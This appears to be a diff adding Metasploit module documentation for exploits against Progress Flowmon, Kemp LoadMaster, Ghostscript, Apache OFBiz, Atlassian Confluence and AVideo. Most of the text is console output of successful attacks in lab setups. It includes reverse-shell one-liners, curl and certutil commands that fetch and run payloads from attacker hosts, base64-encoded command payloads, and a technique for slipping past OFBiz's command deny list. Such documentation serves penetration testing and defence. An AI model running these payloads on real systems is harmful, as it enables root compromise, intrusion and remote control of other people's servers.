+msf6 exploit(linux/local/progress_flowmon_sudo_privesc) > run
+
+[*] Started reverse TCP handler on 192.168.2.23:5555
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Found 2 indicators this is a Progress Flowmon product
+[!] The service is running, but could not be validated.
+[*] Saving payload as /tmp/.fovaiiazfuhl
+[*] Overwriting /var/www/shtml/index.php with payload
+[*] Executing sudo to elevate privileges
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 192.168.2.26
+[+] Deleted /tmp/.fovaiiazfuhl
+[*] Cleaning up addition to /etc/sudoers
+[*] Meterpreter session 9 opened (192.168.2.23:5555 -> 192.168.2.26:33408) at 2024-05-23 16:46:10 -0400
+[*] Restoring /var/www/shtml/index.php file contents...
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : localhost.localdomain.localdomain
+OS           : CentOS 7.9.2009 (Linux 3.10.0-1160.102.1.el7.flowmon.x86_64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```
@@ -0,0 +1,188 @@
+## Vulnerable Application
+Progress Kemp LoadMaster up to at least 7.2.59.2.22338.  The vendor is aware of this "feature," but
+has chosen not to change the behavior.  It was originally paired with CVE-2024-1212, but as this
+privilege escalation was not patched when CVE-2024-1212 was, we split it into its own module.
+This exploit/feature allows the default `bal` user to run several binaries with the `sudo` prefix
+that will elevate without prompting for a password.  As the configuration is based on filename and
+the `bal` user has write permissions to these files, the `bal` user can simply write over the existing
+binary with one of their choosing, then prefix it with `sudo` and launch the binary with `root`
+privileges.
+This module defaults to overwrite `/bin/loadkeys` with `/bin/bash`, though other binaries would work,
+too.
+
+For more details on the vulnerability:  
+https://rhinosecuritylabs.com/research/cve-2024-1212unauthenticated-command-injection-in-progress-kemp-loadmaster/
+
+https://support.kemptechnologies.com/hc/en-us/articles/23878931058445-LoadMaster-Security-Vulnerability-CVE-2024-1212
+
+A trial VM which the exploit should work against out of the box can be downloaded from:
+https://sso.kemptechnologies.com/register/kemp/vlm
+
+The AWS marketplace also has free trials which can be used. These require the "session management" to be enabled in order for the exploit to work. Since by default the admin WUI is behind basic auth.
+https://aws.amazon.com/marketplace/pp/prodview-kgh3dsfk7qcnw
+
+Because this is an appliance, there are limited commands available for command-based payloads.
+
+## Verification Steps
+1. Install the application
+1. Start msfconsole
+1. Gain a session on a Progress Kemp Loadmaster target as the `bal` user
+1. Do: `use exploits/linux/local/progress_kemp_loadmaster_sudo_privesc_2024`
+1. Do: `set SESSION <session>`
+1. Do: `set LHOST <your host IP>`
+1. Do: `run`
+1. You should get a shell as the `root` user.
+
+## Scenarios
+
+### LoadMaster 7.2.59.0.22007
+#### Metasploit Binary Dropper Payload
+```msf
+msf6 exploit(linux/local/progress_kemp_loadmaster_sudo_privesc_2024) > show options
+
+Module options (exploit/linux/local/progress_kemp_loadmaster_sudo_privesc_2024):
+
+   Name           Current Setting  Required  Description
+   ----           ---------------  --------  -----------
+   SESSION        1                yes       The session to run this module on
+   TARGET_BINARY  /bin/loadkeys    yes       The path for a binary file that has permission to auto-elevate.
+   WRITABLE_DIR   /tmp             yes       A directory where we can write files
+
+
+Payload options (linux/x64/meterpreter_reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  10.5.135.201     yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Dropper
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/local/progress_kemp_loadmaster_sudo_privesc_2024) > run
+
+[*] Started reverse TCP handler on 10.5.135.201:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Found 3 indicators this is a KEMP product
+[!] The service is running, but could not be validated.
+[*] Writing payload to /tmp/.rypuliojtdch
+[*] Moving /bin/loadkeys to /tmp/.qyiojnfbnfc
+[*] Moving /tmp/.rypuliojtdch to /bin/loadkeys
+[*] Running /bin/loadkeys
+[+] Deleted /tmp/.rypuliojtdch
+[*] Meterpreter session 2 opened (10.5.135.201:4444 -> 10.5.134.141:28850) at 2024-05-10 08:50:39 -0500
+[*] Moving /tmp/.qyiojnfbnfc to /bin/loadkeys
+[+] /bin/loadkeys returned to original contents
+
+meterpreter > sysinfo
+Computer     : 10.5.134.141
+OS           : SuSE 7.2 (Linux 4.14.137)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > getuid
+Server username: root
+meterpreter > 
+
+
+```
+
+#### Reverse Bash Command Payload
+```msf
+msf6 exploit(linux/local/progress_kemp_loadmaster_sudo_privesc_2024) > show options
+
+Module options (exploit/linux/local/progress_kemp_loadmaster_sudo_privesc_2024):
+
+   Name           Current Setting  Required  Description
+   ----           ---------------  --------  -----------
+   SESSION        1                yes       The session to run this module on
+   TARGET_BINARY  /bin/loadkeys    yes       The path for a binary file that has permission to auto-elevate.
+   WRITABLE_DIR   /tmp             yes       A directory where we can write files
+
+
+Payload options (cmd/unix/reverse):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  10.5.135.201     yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Command
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/local/progress_kemp_loadmaster_sudo_privesc_2024) > run
+
+[+] sh -c '(sleep 4376|telnet 10.5.135.201 4444|while : ; do sh && break; done 2>&1|telnet 10.5.135.201 4444 >/dev/null 2>&1 &)'
+[*] Started reverse TCP double handler on 10.5.135.201:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Found 3 indicators this is a KEMP product
+[!] The service is running, but could not be validated.
+[*] Preparing payload command
+[*] Moving /bin/loadkeys to /tmp/.mnqdvfwutfd
+[*] Moving /bin/bash to /bin/loadkeys
+[*] Running payload command
+[*] Accepted the first client connection...
+[*] Accepted the second client connection...
+[*] Command: echo igZFhKRnh9GplIdu;
+[*] Writing to socket A
+[*] Writing to socket B
+[*] Reading from sockets...
+[*] Reading from socket A
+[*] A: "sh: line 2: Connected: command not found\r\nsh: line 3: Escape: command not found\r\nigZFhKRnh9GplIdu\r\n"
+[*] 
+[*] Moving /tmp/.mnqdvfwutfd to /bin/loadkeys
+[*] Matching...
+[*] B is input...
+[+] /bin/loadkeys returned to original contents
+
+ls
+azurelinuxagent
+bin
+cgroup
+dev
+dmZPnkPUPoV
+etc
+initial_setup.sh
+lib
+lib64
+lost+found
+mnt
+one4net
+openssl
+proc
+root
+sbin
+sks
+sys
+tmp
+user
+usr
+var
+touch tempfile
+ls -l
+total 51
+drwxr-xr-x   5 root root  1024 Mar 22  2023 azurelinuxagent
+.
+.
+.
+-rw-r--r--   1 root root     0 May  3 17:02 tempfile
+.
+.
+drwxr-xr-x  12 root root  1024 Mar 21 17:29 var
+```
@@ -0,0 +1,193 @@
+## Vulnerable Application
+
+This module exploits a format string vulnerability in Ghostscript versions before 10.03.1 to achieve a SAFER sandbox bypass and execute arbitrary commands. This vulnerability is reachable via libraries such as ImageMagick, which is often used by web applications and other services to preview or convert documents.
+
+This module will generate a Encapsulated PostScript (EPS) file that embeds the selected payload. This file can be consumed by any service using a vulnerable version of Ghostscript under the hood.
+
+### Installation
+#### With standalone Ghostscript
+Download the source files from https://github.com/ArtifexSoftware/ghostpdl-downloads/releases/ and build Ghostscript:
+```
+wget https://github.com/ArtifexSoftware/ghostpdl-downloads/releases/download/gs10030/ghostscript-10.03.0.tar.gz
+tar xzvf ghostscript-10.03.0.tar.gz
+cd ghostscript-10.03.0
+./configure
+make
+```
+Then, use the `bin/gs` directly.
+
+#### With ImageMagick
+Follow the steps to build Ghostscript but run an additional `make install` to make sure the binaries are copied at the right location in the system.
+Download ImageMagick source files from https://github.com/ImageMagick/ImageMagick/archive/ and build it:
+```shell
+./configure --prefix=/usr --with-gslib --disable-dependency-tracking
+make
+make install
+ldconfig /usr/lib
+```
+Then, use `identify` or `convert` directly.
+
+#### With a PHP application using ImageMagick on Docker
+Create the following `Dockerfile` (mostly taken from the vulhub projects [1](https://github.com/vulhub/vulhub/blob/1d932c52b9eb257de8c8a20ba7696a598157ef8f/base/imagemagick/7.1.1-17/Dockerfile) and [2](https://github.com/vulhub/vulhub/blob/master/ghostscript/CVE-2019-6116)):
+```dockerfile
+FROM debian:bullseye
+
+RUN set -ex \
+    && apt-get update \
+    && apt-get install -y --no-install-recommends build-essential automake autoconf libtool libltdl-dev wget ca-certificates libpng-dev libjpeg62-turbo-dev \
+        libfontconfig1-dev libfreetype6-dev librsvg2-dev libxml2-dev zlib1g-dev libgif-dev php-cli curl \
+	&& apt-get purge -y --auto-remove -o APT::AutoRemove::RecommendsImportant=false \
+	&& rm -rf /var/lib/apt/lists/*
+
+ARG GS_URL=https://github.com/ArtifexSoftware/ghostpdl-downloads/releases/download/gs10030/ghostscript-10.03.0.tar.gz
+RUN set -ex \
+    && wget -qO- ${GS_URL} | tar xz --strip-components=1 -C /usr/src \
+    && cd /usr/src \
+    && ./configure \
+    && make \
+    && make install \
+    && rm -rf /usr/src/*
+
+ARG IM_VERSION=7.1.1-34
+RUN set -ex \
+    && wget -qO- https://github.com/ImageMagick/ImageMagick/archive/${IM_VERSION}.tar.gz \
+        | tar xz --strip-components=1 -C /usr/src \
+    && cd /usr/src \
+    && ./configure --prefix=/usr --with-gslib --disable-dependency-tracking \
+    && make \
+    && make install \
+    && ldconfig /usr/lib \
+    && rm -rf /usr/src/*
+
+RUN mkdir -p /var/www/html \
+    && echo "<?php \n \
+  if (!empty(\$_FILES)): \n \
+  \$ext = pathinfo(\$_FILES['file_upload']['name'], PATHINFO_EXTENSION); \n \
+  \$size = shell_exec(\"identify -format '%w x %h' eps:{\$_FILES['file_upload']['tmp_name']}\"); \n \
+  echo \"Image size is: \$size\"; \n \
+  else: \n \
+  ?> \n \
+  <form method=\"post\" enctype=\"multipart/form-data\"> \n \
+      File: <input type=\"file\" name=\"file_upload\"> \n \
+      <input type=\"submit\"> \n \
+  </form> \n \
+  <?php \n \
+  endif;" > /var/www/html/index.php
+
+CMD ["php", "-t","/var/www/html", "-S", "0.0.0.0:8080"]
+```
+
+Build the docker image:
+```shell
+build -t php_magick_gs:10.03.0 .
+```
+
+Run it:
+```shell
+docker run --rm -p8888:8080 php_magick_gs:10.03.0
+```
+Access the example web page at http://127.0.0.1:8888 and upload the generated `.eps` file.
+
+## Verification Steps
+1. Install the application
+1. Start msfconsole
+1. Do: `use multi/fileformat/ghostscript_format_string_cve_2024_29510`
+1. Do: `exploit lhost=<local host address>`
+1. Start a handler for the seclected payload
+1. Have the generated Postscript processed by a vulnerable version of Ghostscript
+1. You should get a shell.
+
+## Options
+
+### FILENAME
+The name of the Encapsulated PostScript (EPS) file that will be generated by this module. Default is `msf.eps`.
+
+### INDEX_OUT_PTR
+This module will exploit a format string vulnerability to update the boolean field (`path_control_active`) in memory and disable the `-dSAFER` security sandbox to enable code execution. This field is stored in a specific data structure which can be accessed from a pointer received by the function calling the vulnerable `gs_snprintf()` function. The exploit will dereference this pointer multiple times to reach this field.
+This option specify the index of this pointer (`gp_file *out`) on the stack. The default is `5`, which seems to work most of the time. Note that when Ghostscript is installed on a Docker instance, this index seems to be `6`. That being said, if the exploit doesn't work, try with different index value (usually `4`, `5` or `6`).
+
+
+## Scenarios
+
+### Ghostscript version 10.03.0
+Generate the `.eps` files:
+```
+msf6 exploit(multi/fileformat/ghostscript_format_string_cve_2024_29510) > exploit verbose=true lhost=192.168.1.113
+
+[*] Command to run on remote host: curl -so ./kmMJykHyqUiQ http://192.168.1.113:8080/QAeBnT-6WHJiW5MJjwMrfA; chmod +x ./kmMJykHyqUiQ; ./kmMJykHyqUiQ &
+[+] msf.eps stored at /home/n00tmeg/.msf4/local/msf.eps
+[+] You will need to start a handler for the selected payload first.
+[+] Example usage with Ghostscript: gs -q -dSAFER -dBATCH -dNODISPLAY msf.eps
+[+] Example usage with ImageMagick: identify msf.eps
+```
+
+Start a hander:
+```
+msf6 exploit(multi/fileformat/ghostscript_format_string_cve_2024_29510) > use cmd/linux/http/x64/meterpreter_reverse_tcp
+msf6 payload(cmd/linux/http/x64/meterpreter_reverse_tcp) > set lhost 192.168.1.113
+lhost => 192.168.1.113
+msf6 payload(cmd/linux/http/x64/meterpreter_reverse_tcp) > to_handler 
+[*] Payload Handler Started as Job 0
+```
+
+Execute Ghostscript directly:
+```shell
+./gs -q -dSAFER -dBATCH -dNODISPLAY ~/.msf4/local/msf.eps
+```
+
+Get a Meterpreter session:
+```
+msf6 exploit(multi/fileformat/ghostscript_format_string_cve_2024_29510) > [*] Meterpreter session 6 opened (192.168.1.113:4444 -> 192.168.1.113:56786) at 2024-07-16 11:00:59 +0200
+
+msf6 exploit(multi/fileformat/ghostscript_format_string_cve_2024_29510) > sessions -1
+[*] Starting interaction with 6...
+
+meterpreter > getuid
+Server username: n00tmeg
+meterpreter > sysinfo
+Computer     : 192.168.1.113
+OS           : Arch rolling (Linux 6.9.7-arch1-1)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+```
+
+### ImageMagick version 7.1.1-34 on Docker
+```
+msf6 exploit(multi/fileformat/ghostscript_format_string_cve_2024_29510) > exploit verbose=true lhost=192.168.1.113 index_out_ptr=6 filename=msf6.eps
+
+[*] Command to run on remote host: curl -so ./GzRgKQokL http://192.168.1.113:8080/QAeBnT-6WHJiW5MJjwMrfA; chmod +x ./GzRgKQokL; ./GzRgKQokL &
+[+] msf6.eps stored at /home/n00tmeg/.msf4/local/msf6.eps
+[+] You will need to start a handler for the selected payload first.
+[+] Example usage with Ghostscript: gs -q -dSAFER -dBATCH -dNODISPLAY msf6.eps
+[+] Example usage with ImageMagick: identify msf6.eps
+```
+
+Start a hander:
+```
+msf6 exploit(multi/fileformat/ghostscript_format_string_cve_2024_29510) > use cmd/linux/http/x64/meterpreter_reverse_tcp
+msf6 payload(cmd/linux/http/x64/meterpreter_reverse_tcp) > set lhost 192.168.1.113
+lhost => 192.168.1.113
+msf6 payload(cmd/linux/http/x64/meterpreter_reverse_tcp) > to_handler
+[*] Payload Handler Started as Job 0
+```
+
+Follow the `PHP application using ImageMagick on Docker` installation steps and upload the generated `.eps` file from http://127.0.0.1:8888.
+
+Get a Meterpreter session:
+```
+msf6 exploit(multi/fileformat/ghostscript_format_string_cve_2024_29510) > [*] Meterpreter session 3 opened (192.168.1.113:4444 -> 172.17.0.3:45102) at 2024-07-16 14:46:55 +0200
+
+msf6 exploit(multi/fileformat/ghostscript_format_string_cve_2024_29510) > sessions -1
+[*] Starting interaction with 3...
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : 172.17.0.3
+OS           : Debian 11.10 (Linux 6.9.7-arch1-1)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+```
+
@@ -0,0 +1,114 @@
+## Vulnerable Application
+Apache OFBiz versions prior to 18.12.13 are vulnerable to a path traversal vulnerability. The vulnerable
+endpoint `/webtools/control/forgotPassword` allows an attacker to access the `ProgramExport` endpoint which in
+turn allows for remote code execution in the context of the user running the application.
+
+### Description
+The module can exploit Apache OFBiz running on both Windows and Linux. OFBiz has list of `deniedWebShellTokens`
+which includes strings like `curl` and `chmod` which attempts to prevent ProgramExport from being exploited. The list
+can be bypassed if you encode your payload in unicode characters, which is what is done for payloads being sent to
+Apache OFBiz running on Linux. Trying to do the same on Windows results in the application throwing errors complaining
+about multiple characters.
+```
+      <p>The Following Errors Occurred:</p>
+        <p>org.codehaus.groovy.control.MultipleCompilationErrorsException: startup failed:
+Script1.groovy: 1: unexpected char: &#39;:&#39; @ line 1, column 49.
+```
+
+Which is why the following: `'BadChars' => "\x3a"` has been added. Adding BadChars changes the payload
+to be Base64 encoded and gets powershell to decode and run it: `powershell -w hidden -nop -e <Base64 encoded payload>`
+
+### Setup
+
+#### Docker
+
+1. Run the following docker command to spin up a vulnerable target:
+`docker run -p 8080:8080 -p 8443:8443 --rm -e INIT_DB=2 vulhub/ofbiz:18.12.09`
+
+#### Windows 10 (Build 19045)
+
+1. Download the Java 8 JDK from https://download.java.net/openjdk/jdk8u41/ri/openjdk-8u41-b04-windows-i586-14_jan_2020.zip
+1. Unzip the JDK to a target directory.
+1. Edit `JAVA_HOME` environment variable and set it to the location where you extracted the Java 8 JDK.
+1. Update the `PATH` environment variable to include a path to the same location as `JAVA_HOME`, but with `\bin` at the end of it.
+1. Download a vulnerable version of Apache OFBiz from https://archive.apache.org/dist/ofbiz/apache-ofbiz-18.12.12.zip
+1. Create the directory: `C:\ofbiz`.
+1. Unzip the contents of `apache-ofbiz-18.12.12.zip` into `C:\ofbiz`.
+1. Run `cd C:\ofbiz`.
+1. Run `init-gradle-wrapper` to initialize the Gradle wrapper.
+1. Run `.\gradlew cleanAll loadAll` to clean the system and load the complete OFBiz data.
+1. Once the above completes run `.\gradlew ofbiz` to start the application
+1. Navigate to `https://localhost:8443/webtools`
+
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use apache_ofbiz_forgot_password_directory_traversal`
+1. Set the `RHOST` and `LHOST` options
+1. Run the module
+1. Receive a session in the context of the user running Apache OFBiz.
+
+## Scenarios
+
+### Apache OFBiz 18.12.12 running on Windows 10 (Build 19045)
+```
+msf6 > use multi/http/apache_ofbiz_forgot_password_directory_traversal
+[*] Using configured payload cmd/windows/http/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/apache_ofbiz_forgot_password_directory_traversal) > show targets
+
+Exploit targets:
+=================
+
+    Id  Name
+    --  ----
+=>  0   Linux Command
+    1   Windows Command
+    
+msf6 exploit(multi/http/apache_ofbiz_forgot_password_directory_traversal) > set target 1
+target => 1
+msf6 exploit(multi/http/apache_ofbiz_forgot_password_directory_traversal) > set payload cmd/windows/http/x64/meterpreter/reverse_tcp
+payload => cmd/windows/http/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/apache_ofbiz_forgot_password_directory_traversal) > run rhosts=172.16.199.132 lhost=172.16.199.1
+
+[*] Started reverse TCP handler on 172.16.199.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Tested remote code execution successfully
+[*] Attempting to exploit...
+[*] Sending stage (201798 bytes) to 172.16.199.132
+[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.132:50788) at 2024-06-14 16:46:34 -0700
+
+meterpreter > getuid
+Server username: DESKTOP-N3ORU31\msfuser
+meterpreter > sysinfo
+Computer        : DESKTOP-N3ORU31
+OS              : Windows 10 (10.0 Build 19045).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter > exit
+```
+
+### Apache OFBiz 18.12.12 running in Docker on MacOS 14.5
+```
+msf6 exploit(multi/http/apache_ofbiz_forgot_password_directory_traversal) > run target=0 payload=cmd/linux/http/x64/meterpreter/reverse_tcp rhosts=172.16.199.1 lhost=172.16.199.1
+
+[*] Started reverse TCP handler on 172.16.199.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Tested command injection successfully
+[*] Attempting to exploit...
+[*] Sending stage (3045380 bytes) to 172.16.199.1
+[*] Meterpreter session 2 opened (172.16.199.1:4444 -> 172.16.199.1:54454) at 2024-06-07 13:02:01 -0400
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : 172.17.0.2
+OS           : Debian 11.4 (Linux 6.6.26-linuxkit)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```
@@ -0,0 +1,146 @@
+## Vulnerable Application
+This module exploits an authenticated administrator-level vulnerability in Atlassian Confluence,
+tracked as CVE-2024-21683. The vulnerability exists due to the Rhino script engine parser evaluating
+tainted data from uploaded text files. This facilitates arbitrary code execution. This exploit will
+authenticate, validate user privileges, extract the underlying host OS information, then trigger
+remote code execution. All versions of Confluence prior to 7.17 are affected, as are many versions
+up to 8.9.0.
+
+## Testing
+Download and install a [vulnerable version of Atlassian Confluence](https://www.atlassian.com/software/confluence/download-archives).
+By default, Confluence serves an HTTP service on TCP port 8090. This module was tested against four Confluence installs:
+Linux and Windows Confluence hosts running two different versions, 8.9.0 and 7.20.2. The target host operating systems
+were Ubuntu 22.04 and Server 2022.
+
+## Verification Steps
+Note: Disable Defender if you are using the default payloads.
+
+Steps:
+1. Start msfconsole
+2. `use exploit/multi/http/atlassian_confluence_rce_cve_2024_21683`
+3. `set RHOST 192.168.156.131`
+4. `check`
+5. `set LHOST 192.168.156.129`
+6. `set ADMIN_USER admin`
+7. `set ADMIN_PASS Password123!`
+8. For Windows targets, `set FETCH_COMMAND CERTUTIL` is recommended. For Linux targets, `set FETCH_COMMAND CURL` is recommended.
+9. `exploit`
+
+## Options
+
+### ADMIN_USER
+
+The known Confluence administrator username.
+
+### ADMIN_PASS
+
+The known Confluence administrator password.
+
+## Scenarios
+
+### Windows Server 2022 (10.0 Build 20348)
+```
+msf6 exploit(multi/http/atlassian_confluence_rce_cve_2024_21683) > set payload cmd/windows/http/x64/meterpreter/reverse_tcp
+payload => cmd/windows/http/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/atlassian_confluence_rce_cve_2024_21683) > set ADMIN_USER admin
+ADMIN_USER => admin
+msf6 exploit(multi/http/atlassian_confluence_rce_cve_2024_21683) > set ADMIN_PASS Password123!
+ADMIN_PASS => Password123!
+msf6 exploit(multi/http/atlassian_confluence_rce_cve_2024_21683) > set LHOST 192.168.156.129
+LHOST => 192.168.156.129
+msf6 exploit(multi/http/atlassian_confluence_rce_cve_2024_21683) > set FETCH_COMMAND CERTUTIL 
+FETCH_COMMAND => CERTUTIL
+msf6 exploit(multi/http/atlassian_confluence_rce_cve_2024_21683) > set FETCH_SRVHOST 192.168.156.129
+FETCH_SRVHOST => 192.168.156.129
+msf6 exploit(multi/http/atlassian_confluence_rce_cve_2024_21683) > set RHOSTS 192.168.156.131
+RHOSTS => 192.168.156.131
+msf6 exploit(multi/http/atlassian_confluence_rce_cve_2024_21683) > check
+[*] 192.168.156.131:8090 - The target appears to be vulnerable. Exploitable version of Confluence: 7.20.2
+msf6 exploit(multi/http/atlassian_confluence_rce_cve_2024_21683) > set VERBOSE true
+VERBOSE => true
+msf6 exploit(multi/http/atlassian_confluence_rce_cve_2024_21683) > run
+
+[*] Command to run on remote host: certutil -urlcache -f http://192.168.156.129:8080/h2Wbt3lK1eTiVRc3SNDL1w %TEMP%\iYgswSHqZU.exe & start /B %TEMP%\iYgswSHqZU.exe
+[*] Fetch handler listening on 192.168.156.129:8080
+[*] HTTP server started
+[*] Adding resource /h2Wbt3lK1eTiVRc3SNDL1w
+[*] Started reverse TCP handler on 192.168.156.129:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Exploitable version of Confluence: 7.20.2
+[*] Successfully authenticated to Confluence
+[*] The provided user is an administrator
+[*] Secure Administrator Sessions enabled - elevating session
+[*] Grabbed elevation CSRF token: a8fc89e32b0baa5f6d72247e614e37bdf11c33c4
+[*] Administrator session has been elevated
+[*] Target returned the operating system string 'Windows Server 2022 10.0'
+[*] Grabbed macro CSRF token: de21269d58ebd338bed3a2bd15a4c54fe321785b
+[*] Crafted ProcessBuilder payload string: new java.lang.ProcessBuilder("cmd.exe", "/c", new java.lang.String(java.util.Base64.getDecoder().decode('Y2VydHV0aWwgLXVybGNhY2hlIC1mIGh0dHA6Ly8xOTIuMTY4LjE1Ni4xMjk6ODA4MC9oMldidDNsSzFlVGlWUmMzU05ETDF3ICVURU1QJVxpWWdzd1NIcVpVLmV4ZSAmIHN0YXJ0IC9CICVURU1QJVxpWWdzd1NIcVpVLmV4ZQ=='))).start()
+[*] Sending POST request to trigger code execution
+[*] Client 192.168.156.131 requested /h2Wbt3lK1eTiVRc3SNDL1w
+[*] Sending payload to 192.168.156.131 (Microsoft-CryptoAPI/10.0)
+[*] Client 192.168.156.131 requested /h2Wbt3lK1eTiVRc3SNDL1w
+[*] Sending payload to 192.168.156.131 (CertUtil URL Agent)
+[*] Sending stage (201798 bytes) to 192.168.156.131
+[*] Meterpreter session 1 opened (192.168.156.129:4444 -> 192.168.156.131:51064) at 2024-07-09 10:19:08 -0500
+
+meterpreter > getuid
+Server username: SRV01\Administrator
+meterpreter > pwd
+C:\Program Files\Atlassian\Confluence\bin
+meterpreter > sysinfo
+Computer        : SRV01
+OS              : Windows Server 2022 (10.0 Build 20348).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 1
+Meterpreter     : x64/windows
+```
+
+### Ubuntu 22.04 (Linux 6.5.0-41-generic)
+```
+msf6 exploit(multi/http/atlassian_confluence_rce_cve_2024_21683) > set ADMIN_USER admin
+ADMIN_USER => admin
+msf6 exploit(multi/http/atlassian_confluence_rce_cve_2024_21683) > set ADMIN_PASS Password123!
+ADMIN_PASS => Password123!
+msf6 exploit(multi/http/atlassian_confluence_rce_cve_2024_21683) > set RHOSTS 192.168.156.133
+RHOSTS => 192.168.156.133
+msf6 exploit(multi/http/atlassian_confluence_rce_cve_2024_21683) > check
+[*] 192.168.156.133:8090 - The target appears to be vulnerable. Exploitable version of Confluence: 8.9.0
+msf6 exploit(multi/http/atlassian_confluence_rce_cve_2024_21683) > set FETCH_COMMAND CURL
+FETCH_COMMAND => CURL
+msf6 exploit(multi/http/atlassian_confluence_rce_cve_2024_21683) > set VERBOSE true
+VERBOSE => true
+msf6 exploit(multi/http/atlassian_confluence_rce_cve_2024_21683) > run
+
+[*] Command to run on remote host: curl -so ./UyvwIjHwXcB http://192.168.156.129:8080/zR2OIDxwf8sUzl-Aq0rIXg; chmod +x ./UyvwIjHwXcB; ./UyvwIjHwXcB &
+[*] Fetch handler listening on 192.168.156.129:8080
+[*] HTTP server started
+[*] Adding resource /zR2OIDxwf8sUzl-Aq0rIXg
+[*] Started reverse TCP handler on 192.168.156.129:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Exploitable version of Confluence: 8.9.0
+[*] Successfully authenticated to Confluence
+[*] The provided user is an administrator
+[*] Target returned the operating system string 'Linux 6.5.0-41-generic'
+[*] Grabbed macro CSRF token: 671809d94b9274550326b77f1618381188952a53
+[*] Crafted ProcessBuilder payload string: new java.lang.ProcessBuilder("/bin/sh", "-c", new java.lang.String(java.util.Base64.getDecoder().decode('Y3VybCAtc28gLi9VeXZ3SWpId1hjQiBodHRwOi8vMTkyLjE2OC4xNTYuMTI5OjgwODAvelIyT0lEeHdmOHNVemwtQXEwcklYZzsgY2htb2QgK3ggLi9VeXZ3SWpId1hjQjsgLi9VeXZ3SWpId1hjQiAm'))).start()
+[*] Sending POST request to trigger code execution
+[*] Client 192.168.156.133 requested /zR2OIDxwf8sUzl-Aq0rIXg
+[*] Sending payload to 192.168.156.133 (curl/7.81.0)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 192.168.156.133
+[*] Meterpreter session 1 opened (192.168.156.129:4444 -> 192.168.156.133:60308) at 2024-07-09 10:40:32 -0500
+
+meterpreter > getuid
+Server username: confluence
+meterpreter > pwd
+/atlassian-confluence-8.9.0
+meterpreter > sysinfo
+Computer     : 192.168.156.133
+OS           : Ubuntu 22.04 (Linux 6.5.0-41-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
+```
@@ -0,0 +1,139 @@
+## Vulnerable Application
+
+This Metasploit module exploits an unauthenticated Remote Code Execution vulnerability in the AVideo platform,
+specifically within the WWBNIndex plugin.
+The vulnerability exists due to improper input validation in the `submitIndex.php` file, where the `systemRootPath` parameter
+is directly passed to a `require()` PHP function without proper sanitization.
+Attackers can exploit this by leveraging the PHP filter chaining technique
+to execute arbitrary PHP code on the server.
+The vulnerability is present in versions from 12.4 up to 14.2.
+
+To set up a vulnerable environment for testing, follow the installation steps provided in the AVideo documentation for running with Docker:
+<https://github.com/WWBN/AVideo/wiki/Running-AVideo-with-Docker>.
+Ensure AVideo version installed is between 12.4 and 14.2 and the WWBIndex plugin is installed.
+This can be done by verifying `/var/www/html/AVideo/plugin/WWBNIndex` exists.
+
+## Verification Steps
+
+1. Start `msfconsole` in your Metasploit framework.
+2. Use the module: `use exploit/multi/http/avideo_wwbnindex_unauth_rce`.
+3. Set `RHOSTS` to the target's address where the AVideo platform is installed.
+4. Set `TARGETURI` to the base path of the AVideo installation if it is not at the root directory (default is `/`).
+5. Optionally, configure other options such as `SSL` and `RPORT` if the target environment requires it.
+6. Execute the exploit using the `run` or `exploit` command.
+7. If the target is vulnerable, the module will execute the specified payload, granting access according to the payload's capabilities.
+
+## Options
+
+No options
+
+## Scenarios
+
+### Successful Exploitation against AVideo Platform with WWBNIndex plugin version 12.9
+
+**Setup**:
+
+- Target: AVideo platform with WWBNIndex plugin version 12.9 installed in a Docker container.
+- Attacker: Metasploit Framework.
+
+**Example**:
+
+```
+msf6 > search avideo
+
+Matching Modules
+================
+
+   #  Name                                            Disclosure Date  Rank       Check  Description
+   -  ----                                            ---------------  ----       -----  -----------
+   0  exploit/multi/http/avideo_wwbnindex_unauth_rce  2024-04-04       excellent  Yes    AVideo WWBNIndex Plugin Unauthenticated RCE
+   1    \_ target: Automatic                          .                .          .      .
+   2    \_ target: PHP In-Memory                      .                .          .      .
+   3    \_ target: Unix In-Memory                     .                .          .      .
+   4    \_ target: Windows In-Memory                  .                .          .      .
+
+
